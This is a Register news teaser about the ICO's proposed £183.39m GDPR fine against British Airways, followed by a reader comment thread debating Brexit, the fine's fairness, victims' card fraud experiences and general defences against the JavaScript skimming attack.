UK privacy watchdog threatens British Airways with 747-sized fine for massive personal data blurt

The UK Information Commissioner's Office has warned British Airways it faces a whopping £183.39m fine following the theft of customer records from its website and mobile app servers. The record-breaking fine - more or less the lower end of the price of one of the 747-400s in BA's fleet - under European General Data Protection …

  1. Doctor Syntax Silver badge

    "BA and the other regulators now have 28 days to make representations to reduce the fine."

    Why would the other regulators want to reduce it?

    On the wider issue I can imagine a few penny-pinching manglements and boards having this report thrust in their faces by their underlings this morning.

    1. Ken 16 Silver badge

      GDPR-exit

      No reason for Spain or Ireland to ask, but come November the UK Data Protection rules might drop the level for fines.

      1. Phil O'Sophical Silver badge

        Re: GDPR-exit

        come November the UK Data Protection rules might drop the level for fines.

        There's no reason to think so.

        If UK businesses want to continue to do business with EU companies they will have to maintain GDPR-level data protection after Brexit, just as other non-EU states like the US have to.

        Before GDPR the UK already had higher maximum fines (£500,000) than either France or Germany (€300,000), indeed UK consumer protection legislation is consistently better than the EU minimums.

        1. Claverhouse

          Re: GDPR-exit

          If UK businesses want to continue to do business with EU companies they will have to maintain GDPR-level data protection after Brexit, just as other non-EU states like the US have to.


          Who says the British will WANT to do business with EU people after Brexit ? The whole point is to stride bravely forth into the Atlantic, casting all ties behind, and having nothing to do with those dodgy foreigners and their beastly regulation.


          Aside from that I can easily see Boris impulsively having a bonfire of all regulations in an excess of Bullingdon Daily Telegraph libertarian zeal, not even noticing what this one was for. This is a person who, after all, deliberately lied about EU regulations in his columns, as he cheerfully admitted, in order to stir up dislike and have fun.

        2. Alan Brown Silver badge

          Re: GDPR-exit

          "Before GDPR the UK already had higher maximum fines (£500,000) than either France or Germany (€300,000), indeed UK consumer protection legislation is consistently better than the EU minimums."

          There's a difference between having them on paper and actually enforcing them.

        3. ocflyfish

          Re: GDPR-exit

          "If UK businesses want to continue to do business with EU companies they will have to maintain GDPR-level data protection after Brexit, just as other non-EU states like the US have to."

          Don't be so sure on this. Most of the US-based SMBs have laughed/scoffed/ignored the EU directives on collection of VAT and will likely do the same with GDPR. Don't get me wrong, large multinational corporations will probably comply. But the 29.7 million small businesses here will likely politely tell the ICO to stuff it.

        4. LewisCowles1986

          Re: GDPR-exit

          Why are you comparing minimum fines with maximum fines? That's like saying my boss pays me well, I'm on £5 an hour, he's on £100 a second.

          Also £500,000 is a tiny fine for any moderately sized business. The point should be to make the fine high enough to cause damage, whilst low enough to not make the company go bust, as you cannot learn from mistakes that kill.

          In any case it's valuing the impacted at < £500 per-person.

      2. Doctor Syntax Silver badge

        Re: GDPR-exit

        Several factors to consider here.

        Firstly, offences committed after GDPR applied up until 31st Oct will presumably have to be dealt with under GDPR, just as offences committed pre-GDPR but dealt with after GDPR applied were fined under the old regulations.

        Secondly, if HMG wants to avoid problems for businesses which need to process data of EU residents then they'll need to achieve equivalence which means keeping GDPR-equivalent regulation in place. Whether such sanity will prevail is anybody's guess.

        Thirdly, the current DPA implements GDPR so if the numpty in residence, whoever he may be, doesn't like that he'll have to replace it or repeal it.

        Fourthly, post-Brexit, I presume any fines won't be shared with other EU countries so they may be less to take into account of fines which an EU regulator might apply. Alternatively the maximum sum of EU & UK fines could be 8%. That should make boards think.

      3. 0laf Silver badge

        Re: GDPR-exit

        It's been made pretty explicit that the UK will maintain compliance with the GDPR in order to keep exchanging data with the EU.

        That might change over the few years as the USA gradually takes us over.

        It's actually great that a company is really getting hit with a real stinker of a fine. It'll sharpen up practices across the board I hope.

        1. Ken 16 Silver badge

          Re: GDPR-exit

          I wasn't suggesting that the regulations will change and as you say, the UK want to maintain equivalency of regulation. I was suggesting that although the requirements may remain the same, there's an option to drop the penalties for breaching them.

          1. Anonymous Coward

            Re: GDPR-exit

            The penalties are part of the regulations. See, I'm rather sure the EU would notice keeping the same data handling constraints, but with a nudge and a wink as maximum penalties.

          2. Prst. V.Jeltz Silver badge

            Re: GDPR-exit

            come November the UK Data Protection rules might drop the level for fines.

            Your statement implies we are imposing higher fines as an EU requirement, so how could you then possibly discard that requirement and still "maintain equivalency of regulation"?

            If that was negotiable we could drop them now, and who wants them lowered anyway?

            1. 0laf Silver badge

              Re: GDPR-exit

              I imagine quite a few large businesses who hold huge quantities of personal information on systems and services that have been deliberately starved of resources to maintain them adequately will be very keen to see fines watered down.

              I'm sure Boris will be keen to help since that naughty EU was hardly a friend to business. Much rather we have a US style system where privacy is largely illusory unless you have money to take everyone to court, making citizens a resource and a commodity increasing GDPR.

      4. Moog42

        Re: GDPR-exit

        Nope. Can't maintain adequacy on that basis.

        Numbers differ, but I've heard that UK trade impacted by personal data is in the range of 44%. Not sure impacting that would be in the interests of either side of the Brexit fence.

      5. cynic56

        Re: GDPR-exit

        Why? I'm sure that I read that American 3-letter agency and general 'we own the world' attitude meant that Safe Harbour was dead and no-one would deal with the US corporate data harvesters because it was now illegal. My arse! All I have seen is an unremitting wave of business to AWS and Microsoft cloud.

        Oh and by the way, stop correcting 'harbour' to the incorrect 'harbor'. I am still on the side of the pond that can spell proper (like).

  2. Anonymous Coward

    What goes around comes around....

    From: IAG GBS Communications <iaggbs.communications@iaggbs.com>

    Sent: 21 June 2019 14:48

    To: DG IAG GBS Global Operations <DG.IAGGBS.Global.Operations@iaggbs.com>

    Subject: ★ IAG GBS MC Update ★

    IAG GBS MC Update

    Dear IAG GBS Team,

    You will have seen the announcement today from Willie announcing the new IAG CIO appointment of John Gibbs, who joins IAG on September 2nd from Rolls Royce.

    This is a new direction for IT and shows how critical IT strategy is across the Group. The emphasis of bringing all IT activities under one area including Digital is the next step in the evolution of Group IT.

    Bill Francis made it clear to me at the end of 2018 that he planned to retire at the end of 2019 and hence why we commenced a recruitment process. I would personally like to thank Bill for all his dedication and determination to get us ready for the future. Bill has done a fantastic job ensuring we are ready to transition to the cloud, whilst exploring and utilising the latest technologies.

    Bill said “After 40 years in the travel industry, with 22 of those at BA and more recently IAG, I have thoroughly enjoyed my time working with all colleagues across the Group.

    Change and transformation have always been at the top of my agenda, and whether that was introducing the new mixed fleet cabin crew for BA or creating Group IT within IAG, I hope that I have been able to make a positive difference”.

    Regards,

    Steve Gunning

    Director of IAG GBS

    1. werdsmith Silver badge

      Re: What goes around comes around....

      What comes and goes I imagine is a fairly sizeable wodge of cash and a final salary scheme.

      I'm sure he's not too troubled.

      It will be ordinary BA employees that pay the price.

    2. Anonymous Coward

      Re: What goes around comes around....

      Is it me or does that note read like the outgoing head of Group IT was an Airline Ops guy, not an IT guy?

      Reading between the lines it seems like a Ops transformation guy was put in charge of creating/transforming Group IT?

      Anyone wiser in the ways of IAG care to comment?

      1. Doctor Syntax Silver badge

        Re: What goes around comes around....

        "Is it me or does that note read like the outgoing head of Group IT was an Airline Ops guy, not an IT guy?"

        Should it surprise anyone? It's the management attitude that a good manager doesn't need to know anything about what they're managing. That's why we get to call them manglement.

        1. CrazyOldCatMan Silver badge

          Re: What goes around comes around....

          a good manager doesn't need to know anything about what they're managing

          As long as they have good people that do know and that the manager trusts then they really don't. Good management isn't (generally) about knowledge - it's about people skills and process skills.

          (Of course, people skills are probably the reason why there are very few good IT people in senior management since good IT skills and abilities seem to be the opposite of skills required to reach senior management..)

          1. nematoad Silver badge

            Re: What goes around comes around....

            "...good IT skills and abilities seem to be the opposite of skills required to reach senior management..."

            I don't know about that. Try working on a site that has the ability to blow the nearby town into the next county, with process operators more interested in keeping the place safe than why the computer won't do what it needs to do and is thus pretty upset with IT and the IT department in general and is in no mood to wait or be fobbed off.

            I did that as a desktop support person and believe me, having a 17 stone Scot raging at you as to why you can't fix the computer NOW needs a lot of people skills. If you had said skills most of the guys were fine once you explained what needed to be done and what you proposed to do about it. Same with senior management. The trouble was with the middle layers. Noisy, demanding and cursed with a minuscule amount of "computer literacy", those were the ones to avoid if at all possible. Dealing with them meant you really got a "people skills" workout as well as developing techniques for controlling blood pressure, temper etc.

            So yes, you don't get to develop arse-licking and back-covering, but then again this is top brass we are talking about and I reckon those skills would only qualify you for a middle level job.

      2. Anonymous Coward

        Re: What goes around comes around....

        How often have you met an IT director who knows much about IT? They're either parachuted in from another area or they're former devs/admins who - after suitable brown nosing ground work - were promoted out of harm's way and managed to continue that for years.

      3. werdsmith Silver badge

        Re: What goes around comes around....

        Is it me or does that note read like the outgoing head of Group IT was an Airline Ops guy, not an IT guy?

        I think he was head of "Inflight Experience" which means he was chief cabin crew.

        1. CrazyOldCatMan Silver badge

          Re: What goes around comes around....

          he was chief cabin crew

          Exits are here, here and here.

          *My* exit is over there - the one with the big bucket of cash waiting for me. Just think of all the fake tan I can buy!

    3. Annihilator

      Re: What goes around comes around....

      "You will have seen the announcement today from Willie announcing the new IAG CIO appointment of John Gibbs, who joins IAG on September 2nd from Rolls Royce."

      Ha! Willie...

  3. Anonymous Coward

    disappointed in the fine because it cooperated fully

    well, that's why it is REDUCED (and going to be watered down more and more until the public lose interest, and in 5 years time, they'll have reduced it to 1 million, it'll be quietly paid). But hey, they had to write SOMETHING in the meantime. They're disappointed.

  4. nematoad Silver badge

    Wait and see.

    "...had found no evidence that the stolen cards were used"

    Yet.

    1. Gordon 10

      Re: Wait and see.

      tbf I would expect most of the cards to be used pretty quickly. Once a card is known to have been leaked you can pretty much expect it to be cancelled.

      The cynic in me does wonder if they asked their customers or looked for evidence that the cards had been used.

      1. Anonymous Coward

        Re: Wait and see.

        My wife was one of the cards compromised - to be honest BA were quicker to respond than the bank. They advised us to cancel the cards after a day or so, at which point the bank asked us why we were needing replacements. Then the bank got in touch a couple of weeks later to say if we hadn't already, we should get them replaced.

        BA also provided a 12 month subscription to one of the credit reference agencies for free as well.

        1. jms222

          Re: Wait and see.

          > BA also provided a 12 month subscription to one of the credit reference agencies for free as well

          and paid you for the privilege I hope, since they now get to grab even more of your data. What happens if somebody you want to borrow from happens to use only the _other_ credit reference shits instead?

          1. Anonymous Coward

            Re: Wait and see.

            Not quite sure how using the credit reference agencies helps BA grab more data?

            But yes, seeing as how I have a perfect score in one agency and a mid tier score in another, I do wonder about things like that.

            1. Phil O'Sophical Silver badge

              Re: Wait and see.

              Not quite sure how using the credit reference agencies helps BA grab more data?

              Those agencies don't operate for free, and if you're not paying them someone else must be. That someone else will want to get something in return. Your data is the obvious coin.

              As always, if you're not paying for the product, you are the product

              1. Doctor Syntax Silver badge

                Re: Wait and see.

                "if you're not paying them someone else must be"

                In this particular case the someone else was BA. The data was just a bonus.

        2. Gonzo wizard

          "BA were quicker to respond than the bank"

          According to this post on twitter - https://twitter.com/musalbas/status/1148145302328815617 - by the person who originally discovered the issue, BA sat on a GDPR request asking why personal details were being leaked for 30 days before responding, removing the dodgy tracking code on the same day. I bet your bank didn't sit on this for 30 days, did they?

          It also explains why the ICO says the incident started at the end of June while BA told them it started in August.

          1. Anonymous Coward

            Re: "BA were quicker to respond than the bank"

            We got the response from BA about 3 or 4 days after the news found out - then 2-3 weeks later for the bank. So not especially quickly.

    2. Anonymous Coward

      Re: Wait and see.

      I can almost guarantee the stolen card details were used.

      One of our company credit cards was used fraudulently just after the hack period ended, having been used to make a purchase on the BA website during the hack period. It wasn't used to make purchases on many other sites and certainly none of the others looked to be breached.

      Luckily Barclaycard flagged the transaction and we cancelled the card before any damage was done.

    3. macjules

      Re: Wait and see.

      Can and have provided evidence to BA and Met police that 2 cards - my business credit card and my wife’s personal card - were cloned after having purchased flights from BA within the fraud timeline.

      To date I have not received any offers of ‘credit worthiness tracking’ or compensation from BA and I only received the standard round-robin email that they sent out. Costs incurred were time on phone to card company plus having to arrange fast replacements when the fraud became apparent which I billed at 2 hours work. To date my invoice to BA for £350 + VAT remains unpaid.

      1. Doctor Syntax Silver badge

        Re: Wait and see.

        "To date my invoice to BA for £350 + VAT remains unpaid."

        Add interest and then go to the small claims court. If they still don't pay having a bailiff distrain a 747 should be interesting and get their attention.

        1. macjules

          Re: Wait and see.

          I want an A320 - no Boeing crap for me. Failing that Terminal 5 will do nicely.

    4. Anonymous Coward

      Re: Wait and see.

      "...had found no evidence that the stolen cards were used"

      This kind of BS triggers me every time!

      Of course, genius, whoever uses those card numbers is not gonna put it in the public press! And even though it is reported, you can always feel free to look the other way.

      FFS, why even is this nonsense reported?

      1. tip pc Silver badge

        Re: Wait and see.

        I assume the card processors, issuers or BA's insurance have reported back to BA that the cards haven't been used fraudulently as a result.

    5. LewisCowles1986

      Re: Wait and see.

      What is their fee from Visa / Mastercard for this? AFAIK Visa can charge 4.5k per person per incident per-day

  5. DaLo

    Oh that'll be a nice bit of compensation for the customers whose data was taken due to security failings.

    Doesn't help with the amount of anguish knowing you are just a moment away from being the victim of identity theft and having to once again change your card details and keep constantly vigilant for unauthorised loan applications. However £378 goes a little way towards easing the pain.

    ...wait, what was that?

    You're saying the people whose data got stolen don't get any of it and the money all goes into the general taxation pot?

    Well that sucks.

    1. adam 40

      Just another tax

      I completely agree, all these fines do nothing to compensate the victims of the theft.

      The companies just carry on regardless, the government fines them, and the public are shafted.

      1. Anonymous Coward

        Re: Just another tax

        "The companies just carry on regardless, the government fines them, and the public are shafted."

        Yes...the government adds the fines to their big pile of money and never release it back to pay for any services used by taxpayers.

        Is it fair for those directly affected? Probably not but at the same time proving they were affected may be difficult based on the stories of affected people with banks blocking transactions and a significant number of the cards being replaced quickly.

        The company fine goes towards the "public good" and those directly affected benefit more than if they employed lawyers to go after the company directly. Which is good for everyone but the lawyers...

  6. Warm Braw

    Scripts are often used to support marketing and data tracking functions

    You would hope that fines such as these would help companies quantify the cost of gathering the information they "have to have" on their marketing activities.

    However, I suspect the typical response will be to sack a few developers who were required to provide the tracking, then sack a few more who refuse to take on the future responsibility, then carry on exactly as before. As in the crypto "debate", the ability of people in power to demand two mutually-exclusive things simultaneously shows no sign of faltering.

    1. Doctor Syntax Silver badge

      Re: Scripts are often used to support marketing and data tracking functions

      I'd like to think they'll also evaluate their policies re opt-in/opt-out.

      E.g. this morning I tried to phone Hotpoint spares. Their pre-recorded rigmarole was that we might spam you with post or phone unless you opt-out. That's a breach of GDPR right there. I didn't get as far as opting out, however; I gave up on their appalling ACD.

      1. Alan Brown Silver badge

        Re: Scripts are often used to support marketing and data tracking functions

        "Their pre-recorded rigmarole was that we might spam you with post or phone unless you opt-out"

        Every so often I send heads-up emails about such things to the ICO. Apart from the canned responses nothing gets done and I'll invariably find that the same message is on the phone system when calling several months later.

  7. Potemkine! Silver badge

    The group is believed to have exploited third party scripts, possibly modified JavaScript, running on BA's site to gain access to the airline's payment system.

    Noscript rulz!

    When a website doesn't work with NoScript on because it uses 3rd party JavaScript then I try to find an alternative, and the original website loses a customer.

    1. mikeo

      Great solution

      ...for 0.2% of people.

      1. Doctor Syntax Silver badge

        Re: Great solution

        Therein lies a problem. If a sufficient number were knowledgeable enough to use blockers there'd be a sort of herd immunity in that the site owners would have to make a choice between tightening up or losing custom.

        1. mikeo

          Re: Great solution

          "If a sufficient number..."

          Which is highly unlikely to ever happen. Ever asked a non-techie to use NoScript? Hard enough convincing them to use unique passwords and patch their shit which is of far greater benefit. Blocking scripts, while interesting and useful in some cases, is not a workable solution.

          1. Doctor Syntax Silver badge

            Re: Great solution

            "Blocking scripts, while interesting and useful in some cases, is not a workable solution."

            It is for those who use it.

            1. Anonymous Coward

              Re: Great solution

              No, blocking scripts is not a workable solution for certain scenarios, and I hate to say this, because I use half a dozen (or more) ad blockers, on top of script-blocking. But when I buy (not search for!) an airline ticket, or any other product or service online, I go to the old ugly IE. I just don't have time / patience to chase my bank or shop over the phone, when my payment, put through well-defended Firefox, comes up with an "oops, something went wrong" page.

              1. 0laf Silver badge

                Re: Great solution

                Yep awful but true.

                Banking websites as well. Many unusable without turning off script and tracking blockers.

    2. Elregouk

      What planet do you all live on? Javascript is a part of the modern internet. Fucking get a grip. Put your tinfoil hats away

      1. Anonymous Coward

        We live in a place where we pick what we like to be exposed to and what actions we do that will affect our lives, like what to eat, who to meet, and which javascript to load.

        Unlike the common people like you who just blindly put their trust on random strangers and hope you don't get F*cked and Gripped, when in reality real people are getting F*cked and Gripped for the very same mistake.

        1. Elregouk

          Common people?? Arrogant wanker.

  8. Vivid Professional

    BA don't have any B747-8s. They have B747-436s, but defo not a B747-8.

  9. MJB7

    GDPR

    Ah-ha! Now we start to see cases actually *under* GDPR. If the fine goes through at anything like this level, boards are going to start paying rather more attention to whether they actually need that data, and if so, how to protect it.

  10. Anonymous Coward

    Good

    Let this be a lesson to all large companies. Put money into securing your shit, or we'll take it off you as a massive penalty when you allow yourself to be hacked, and you won't get a bonus!

    1. Fred Dibnah

      Re: Good

      I'm pretty sure bonuses and dividends will be unaffected.

      1. Anonymous Coward

        Re: Good

        Bonuses - hell no.

        Dividends - likely, though not included in the latest dividend (£700M paid today, by the way...) since nothing has been fined yet. If that £183M needs to be paid in a later day, it will affect the dividend and probably the stock price as well.

        Year-over-year the stock has lost almost 40% of its value, which may make some investors a tad nervous. This tanking probably has very little to do with this data blurt, but heads may roll in any case.

  11. codejunky Silver badge

    Hmm

    The data was stolen from BA. BA have been stolen from and now they will be fined for being the victim of theft. Cooperating with the investigation and the attackers seem to be known as a criminal group who do this.

    Just reads a little odd. Maybe BA did bad. But I must have missed that bit.

    1. Phil O'Sophical Silver badge

      Re: Hmm

      It's not a question of blame, or victim/thief, it's purely one of responsibility. BA took its customers' data and failed to protect it adequately. The buck stops with them, and they get the fine.

      1. 0laf Silver badge

        Re: Hmm

        Eh?

        If a bank took your valuables, charged you for the privilege of having an account to store these things and then left the safe door open letting everything be stolen one evening, would you be thinking "aw poor bank, they didn't mean it to happen, never mind about my precious things, you look sad"? I don't think so.

        As someone else has pointed out, if you do everything you should have done and data is still stolen from you then in all likelihood you will not be fined by the ICO.

        BA were incompetent and thoroughly deserve a multimillion £ kick in the nads. I'd also add IMHO they are bloody incompetent as an airline as well.

    2. STOP_FORTH Silver badge

      Re: Hmm

      BA dun incompetent. If BigCo wants your private data they are supposed to look after it properly. GDPR isn't hard to understand, people just find it hard to do. Or they can't be bothered.

    3. Tom 38

      Re: Hmm

      BA haven't been stolen from, because they didn't own the data that was taken. BA have been fined because they were unreliable guardians of that data.

    4. codejunky Silver badge

      Re: Hmm

      I understand the replies I am getting, that BA was to be responsible for the data. But the data can always be got to in some way or other and so anyone can be stolen from (physically or digitally) as proven every day.

      I have no problem with a fine for BA if they didn't do the expected things to protect the data (and that might be the case here, I just didn't see it) but to be fined because you were stolen from, even if it's other people's property stolen from your possession, seems harsh.

      I am not against strong protection of user data. But if we want users then data will be collected and there is always a possibility of compromise. All you can do is best practices.

      1. Tom 38

        Re: Hmm

        But if we want users then data will be collected and there is always a possibility of compromise. All you can do is best practices.

        Which they didn't do, which is why they get the big fine, and about fucking time.

    5. Charlie Clark Silver badge

      Re: Hmm

      It's negligence: British Airways failed to protect customers' personal data correctly.

      GDPR makes it quite clear that companies that can demonstrate that they have followed the recommendations of the data protection regulators have little to fear. In essence, GDPR limits their exposure to cases brought as a result of their behaviour, as courts can point to the settlement and say: dealt with.

      By contrast look at some of the settlements across the pond. Boeing has set aside $100 million as compensation for the US victims of two plane crashes and Equifax is subject of at least one class action.

      However, at the end of the day, the fine sounds worse than it actually is, because it is a charge that can be offset against tax.

      1. Anonymous Coward

        Re: Hmm

        By contrast look at some of the settlements across the pond. Boeing has set aside $100 million as compensation for the US victims of two plane crashes and Equifax is subject of at least one class action

        It seems disproportionate to me. I don't know the details but it was not the case that BA took no security measures, and once they knew there was an issue they did respond, albeit that the measures and response may have been inadequate and/or tardy. The fine seems orders of magnitude more than reasonable and this is reinforced by the comparison with Boeing.

        Boeing's provision is half the fine against BA. It is quite clear that they designed and manufactured an aircraft which was unsafe. The issue was, even given allowance for hindsight, of such an obvious nature it should have been identified, and there is evidence that the information given to the regulator was misleading and inaccurate. Hundreds of people have died as a result of this and yet the provision made is only half the amount that BA have been fined as a result of being victims of a criminal attack for which they were not responsible and in which no one was injured or likely to be injured, let alone killed.

        There is a massive disconnect between these two numbers.

  12. Anonymous Coward

    BOAC

    Better Order Another Certificate

    1. werdsmith Silver badge

      Re: BOAC

      That certificate expired in 1974.

      1. Fred Dibnah

        BCal

        Better Call a Lawyer.

  13. MJI Silver badge

    Also worrying

    They are planning to buy some 737s.

    Best avoided then, what a fall over the years.

  14. amanfromMars 1 Silver badge

    It is almost as if it were criminal .......

    Is the fine figure .... £183.39m ..... an arbitrary confection?

    Who decided and who signed off on the figure and who will be spending the windfall and on what are always awkward questions which are hardly ever answered truthfully.

    1. Sadie

      Re: It is almost as if it were criminal .......

      It's a percentage of their Worldwide income IIRC - Maximum they can fine is 4%

      1. theblackhand

        Re: It is almost as if it were criminal .......

        "The total proposed fine of £183.39 million would be the biggest penalty ever issued by the ICO​.

        It is the equivalent of 1.5% of BA's global turnover for the financial year ending December 31 2018."

        Ref: https://www.standard.co.uk/news/uk/british-airways-fined-more-than-180m-for-customer-data-breach-a4184376.html

  15. Anonymous Coward
    Anonymous Coward

    28 days later... the fine has been reduced on appeal to £1.83 and it’s business as usual and trebles all round at BA. I hope I’m wrong.

    1. Charlie Clark Silver badge

      No need: the fine can be declared as cost and, hence, offset against tax. Someone goes for early retirement and then it's G&T's in the C-Suite later.

      More important, however, will be the precedent set by the ruling.

      1. Stu J

        Pretty sure fines aren't tax-deductible...

        Edit:

        https://www.gov.uk/hmrc-internal-manuals/business-income-manual/bim42515

        "Regulatory bodies

        Where a trader incurs a liability to a regulatory body on revenue account that is broadly intended to cover the regulator’s costs of performing its duties in relation to the trading activities, such costs will normally be allowable even where the trader has committed a breach of regulations. However, should a regulatory body impose a penalty for breach of regulations, or should a penalty or fine become payable as a result of a prosecution for a trader’s breach of regulations, this will not be an allowable expense (see McKnight v Sheppard [1999] 71TC419)."

        1. AVee
          Thumb Up

          To get a car analogy in: if you replace your tires because they are worn below the minimum tread depth, the cost of the tires is deductible, regardless of whether you replaced them on time or (way) too late. However, the fine you get for driving with worn tires is not deductible. That seems remarkably in line with common sense...

          Thank you for clearing that up, too many people here seem to think companies can just deduct fines where clearly they can't.

        2. Charlie Clark Silver badge

          For multinationals there is almost always a way. VW would have gone bankrupt by now otherwise.

  16. Yet Another Anonymous coward Silver badge

    Remember the good old days

    When BA was the one doing the hacking and then walked away free because the computer running other airline's data was on their premises and so it wasn't hacking

  17. JoeySter

    It's not entirely clear what the breach actually was. It sounds like more of a client side attack than a breach of internal data. Something as simple as HTML/HTTP browser settings?

  18. andy 103
    Facepalm

    Trivial to mitigate

    The article https://www.theregister.co.uk/2018/09/11/british_airways_website_scripts/ points out how attacks like this work.

    In essence a js file hosted on BA's own domain was modified so it posted details to a third party domain. The fact the js file could be modified on their production server is in itself scary, but how can you protect against that?

    An easy way is just to monitor the filesystem for changes to any .js file, say every hour. Perhaps diff it against the master copy in their version control. If there are differences email the entire development team as that safeguards against it being an inside job.

    A couple of mins work, save several million quid in fines and pissing off a load of (lost) customers. Too simple perhaps?!

    1. Charlie Clark Silver badge

      Re: Trivial to mitigate

      but how can you protect against that

      One of the standard settings for any webserver is that its user cannot write to any of its files, so that it exists in an effectively read-only file-system. This should be standard practice as it was the go-to exploit in the days of CGI.

      But that itself is not the reason for the size of the fine. There was systematic failure across the line, including on how the data was stored.

    2. Anonymous Coward
      Anonymous Coward

      Re: Trivial to mitigate

      "The fact the js file could be modified on their production server is in itself scary, but how can you protect against that?"

      Containers and immutable filesystems?

    3. Anonymous Crowbar

      Re: Trivial to mitigate

      Any kind of FIM should have picked this up.
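
The check andy 103 sketches above (hash the deployed .js files, diff against the known-good copy, shout when they differ), combined with the content scan MrSeaneyC's and SVV's points imply (a modified first-party script that now talks to a third-party host), as an added example. This is not code from BA, IAG or The Register; the webroot layout, the domain names `example-airline.test` and `skimmer.test`, and the sample scripts are constructed for the demo.

```python
"""Integrity check for first-party web assets: hash every .js file under the
webroot, compare against a known-good manifest and flag any modified or new
script that now references a host outside the allow-list.

Added example; not code from BA, IAG or The Register. Paths, domain names and
the sample scripts are constructed for the demo.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Absolute URLs in script source; group 1 is the host.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large bundles don't load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(webroot: Path, suffixes=(".js",)) -> dict:
    """Map each script's path (relative to webroot) to its hash.
    In production take the baseline from the deploy artefact or version
    control, not from the live server, so a tampered file cannot re-baseline itself."""
    return {
        p.relative_to(webroot).as_posix(): hash_file(p)
        for p in sorted(webroot.rglob("*"))
        if p.is_file() and p.suffix in suffixes
    }


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Report which files changed, appeared or disappeared since the baseline."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def foreign_hosts(source: str, allowed_hosts) -> list:
    """Hosts referenced by absolute URLs in the script that are neither an
    allowed domain nor a subdomain of one. A skimmer has to send the data somewhere."""
    hosts = set(URL_RE.findall(source))
    return sorted(
        h for h in hosts
        if not any(h == a or h.endswith("." + a) for a in allowed_hosts)
    )


def check_webroot(webroot: Path, baseline: dict, allowed_hosts) -> dict:
    """Full check: manifest diff plus a content scan of every changed script."""
    report = diff_manifests(baseline, build_manifest(webroot))
    report["suspicious"] = {}
    for rel in report["modified"] + report["added"]:
        src = (webroot / rel).read_text(errors="replace")
        hosts = foreign_hosts(src, allowed_hosts)
        if hosts:
            report["suspicious"][rel] = hosts
    return report


def demo() -> dict:
    """Constructed scenario: a clean deploy, then a payment script on the
    site's own domain is altered to post form data to a third-party host."""
    with tempfile.TemporaryDirectory() as d:
        webroot = Path(d)
        (webroot / "js").mkdir()
        checkout = webroot / "js" / "checkout.js"
        checkout.write_text(
            "function pay(form) {\n"
            "  fetch('https://www.example-airline.test/api/pay',"
            " {method: 'POST', body: new FormData(form)});\n}\n"
        )
        (webroot / "js" / "ui.js").write_text("console.log('ui loaded');\n")
        baseline = build_manifest(webroot)  # the known-good state

        # Tampering (constructed): a submit handler appended to the legitimate file.
        with checkout.open("a") as f:
            f.write(
                "window.addEventListener('submit', e => fetch('https://skimmer.test/collect',"
                " {method: 'POST', body: new FormData(e.target)}));\n"
            )
        return check_webroot(webroot, baseline, allowed_hosts=["example-airline.test"])


if __name__ == "__main__":
    print(demo())
```

Run it from a monitoring host that only has read access to the webroot, and feed it a baseline produced by the build or deploy pipeline rather than one taken from the server; otherwise an attacker who can write the script can write the manifest too. Detection is the fallback: a webroot the server process cannot write to, as Charlie Clark describes, removes the write in the first place, and a Subresource Integrity hash on the script tag makes the browser refuse to run a first-party file whose content no longer matches.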

  19. EnviableOne

    Regulations

    The GDPR wording talks about turnover of the Undertaking, which would extend to the whole of IAG, especially if IT systems are managed as a group resource.

    this would allow the fine to grow

    183m is a baby of a fine, and considering the circumstances, size of breach and the Blue Chip status of the BA name, not unreasonable.

  20. SVV

    Such scripts are often used to support marketing and data tracking functions or running external ads

    So they spent their time and money trying to monetise personal data, rather than trying to secure personal data. And people are moaning that they've now had to pay a fine for all the damage it caused?

    Serves them right for seeing personal data as an opportunity rather than a responsibility.

  21. Anonymous South African Coward Bronze badge

    What will happen should you make heavy use of outsourced IT and outsourced IT slips up big-time causing you to be slapped with a major GDPR breach and fine?

    1. Korev Silver badge

      I'd love to know if the "savings" from the above are greater than the fine...

      1. Anonymous Coward
        Anonymous Coward

        So-called "savings" from an off-shore model are a fad, and the only people who believe it are the Excel spreadsheet experts that care about nothing else but numbers; it's rendering them good results. Real question is: will they ever learn their lesson?

    2. Anonymous Coward
      Anonymous Coward

      I'd probably sack them off, I'm sure a decent contract will allow that, and possibly recover charges if they are irresponsible. Although if they lost the data would they be the ones getting the fines? The thing I like about GDPR is that it makes companies think about data where they probably have not bothered before.

    3. Anonymous Coward
      Anonymous Coward

      You pay the fine and then try to get the money back from the outsourcer(s) - good luck with that.

    4. Alan Brown Silver badge

      "... heavily outsourced IT... slips up ... major GDPR breach and fine..."

      You are the data handler, therefore you get the fine. It is YOUR responsibility to ensure the outsourcer is secure.

      This is not much different than a retailer's obligation on sale of goods, vs recovering costs from the suppliers.

      Further litigation between you and the outsourcer over the issue may or may not come under the regulators' purview, depending on how the data was handled and the contracts setup, but you can be assured that if you didn't do your due diligence in the first place you're going to get doubletapped pretty hard by the regulators up front.

  22. Anonymous Coward
    Anonymous Coward

    Should be more expensive

    Fine not high enough. Besides, no one mentions the fact that BA has outsourced their ops to off shore with the penny pinching mindset so many have, yes it's cheap but it also comes with an army of mostly short skilled people who replaced those they once used to have in house. To their management, it's working well.

    1. Charlie Clark Silver badge

      Re: Should be more expensive

      The fines are designed to be punitive but not crippling, otherwise they'd never become law.

      1. Alan Brown Silver badge

        Re: Should be more expensive

        On the other hand, if BA do it again, the fine will be larger and negotiation won't be much of an option.

        Most regulators work on the basis that the first bite is low value, but if they ever have to show up on your doorstep again then they're going to go over every inch of your business with a fine tooth comb and they won't be forgiving about what they find.

  23. SGJ

    £183 million sounds a lot...

    ... but it works out at only £366 per card (or the price of a couple of aircraft?)

  24. Anonymous Coward
    Anonymous Coward

    more or less the lower end of the price of one of the 747-400s

    Not been made for a while, a good 14 years for the passenger version. A bit more up to date journalism gives the 787-8 list price (big airlines never pay this) as $248.3M (£198.64M), makes good copy but sadly way off the mark.

    Anyhow anyone giving BA a good kicking always deserves a cigar in my book, luggage losing overbooking rude bastards.

  25. Joe Gurman

    Isn't it time....

    .... to start comparing fines to actual (not list) prices of A380s, which have pretty much become as past-tense in terms of production as the passenger versions of the 747?

  26. Greg D

    Unpopular Opinion

    This may not be popular here, but haven't we got cyber security backwards?

